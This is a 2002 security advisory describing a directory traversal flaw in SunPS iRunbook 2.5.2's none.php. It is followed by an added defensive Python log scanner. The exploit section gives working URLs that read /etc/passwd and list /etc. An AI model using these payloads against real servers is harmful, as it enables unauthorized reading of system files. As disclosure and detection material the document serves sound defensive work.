Portcullis Security Advisory - Directory Traversal Vulnerability in SunPS iRunbook 2.5.2

From: JWC@portcullis-security.com
Date: 07/11/02


From: JWC@portcullis-security.com
To: bugtraq@securityfocus.com
Date: Thu, 11 Jul 2002 10:11:54 +0100

Portcullis Security Advisory

Directory Traversal Vulnerability in SunPS iRunbook 2.5.2

Vulnerability discovery and development: John Clayton, Portcullis Security
Testing Services Team Leader

Affected system: SunPS iRunbook Version 2.5.2 (compiled by Mike Corlett,
15:00, 8th January 2002) running on Apache 1.3.22 with PHP 4.0.6. Kernel
version: SunOS 5.8 Generic 108528-12 September 2001. System type:
SUNW,Sun-Blade-100

Details:
The file none.php, used in iRunbook Explorer to view files from the build
snapshot, can be manipulated to view any file or folder on the server,
provided the web server user has read access to the file and directory. This
was initially achieved by studying the request strings in the links used to
view files in the build report and seeing that they request file paths with
":" instead of the usual "/". Thus it was possible to use directory
traversal to view any file or folder. Later it was discovered that the
"..:..:" wasn't needed to traverse directories and the path to the file just
needs to be entered in the web browser after the ?.

Impact:

Any user that can access the webserver can view files and directories on the
system that are usually world readable such as /etc/ and /etc/passwd.

Exploit:

view passwd file -

http://>/content/base/build/explorer/none.php?..:..:..:..:..:..:..:etc:passwd:

or

http://>/content/base/build/explorer/none.php?/etc/passwd

view contents of /etc directory -

http://>/content/base/build/explorer/none.php?..:..:..:..:..:..:..:etc:

or

http://>/content/base/build/explorer/none.php?/etc/
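
For defenders reviewing web server logs, the following added example (not part of the Portcullis advisory and not iRunbook code) flags none.php requests whose query string resolves outside the build snapshot, treating ":" as the path separator as the advisory describes. The snapshot root, the log lines and the file names in them are constructed assumptions.

```python
import posixpath
import re
from urllib.parse import unquote

# Assumption: directory none.php is meant to serve; the advisory does not name it.
SNAPSHOT_ROOT = "/opt/irunbook/snapshot"

# Client address and query string of a none.php request in an Apache access log.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) \S*/none\.php\?(\S*) HTTP/')

def classify_query(query, root=SNAPSHOT_ROOT):
    """Return 'ok', 'absolute' or 'traversal' for a none.php query string."""
    # Decode first so encoded characters are judged like literal ones, then
    # map the ":" separator used by the explorer links onto "/".
    path = unquote(query).replace(":", "/")
    if path.startswith("/"):
        return "absolute"      # e.g. none.php?/etc/passwd
    resolved = posixpath.normpath(posixpath.join(root, path))
    if resolved != root and not resolved.startswith(root + "/"):
        return "traversal"     # "..:" segments climbed above the snapshot root
    return "ok"

def scan(lines, root=SNAPSHOT_ROOT):
    """Return (client, verdict, query) for each request leaving the snapshot."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        client, query = m.groups()
        verdict = classify_query(query, root)
        if verdict != "ok":
            hits.append((client, verdict, query))
    return hits

# Constructed sample log lines (documentation addresses, invented file names).
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Jul/2002:10:02:11 +0100] "GET /content/base/build/'
    'explorer/none.php?reports:build:index.html HTTP/1.0" 200 5120',
    '192.0.2.44 - - [11/Jul/2002:10:03:40 +0100] "GET /content/base/build/'
    'explorer/none.php?..:..:..:..:..:..:..:etc:passwd: HTTP/1.0" 200 812',
    '192.0.2.44 - - [11/Jul/2002:10:03:52 +0100] "GET /content/base/build/'
    'explorer/none.php?/etc/ HTTP/1.0" 200 2048',
]

if __name__ == "__main__":
    for client, verdict, query in scan(SAMPLE_LOG):
        print(f"{client} {verdict:9} {query}")
```

The same containment check (resolve the requested path, then require it to stay under the snapshot root) is what the server-side handler would need before opening the file.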

Copyright Portcullis Computer Security Limited 2002, All rights reserved
worldwide.

Permission is hereby granted for the electronic redistribution of this
information. It is not to be edited or altered in any way without the
express written consent of Portcullis Computer Security Limited.

Disclaimer: The information herein contained may change without notice. Use
of this information constitutes acceptance for use in an AS IS condition.
There are NO warranties, implied or otherwise, with regard to this
information or its use. Any use of this information is at the user's risk.
In no event shall the author/distributor (Portcullis Computer Security
Limited) be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.

John Clayton
Portcullis Computer Security Ltd.
Security Testing Services Team Leader and
Dragon IDS Technical Product Manager
www.portcullis-security.com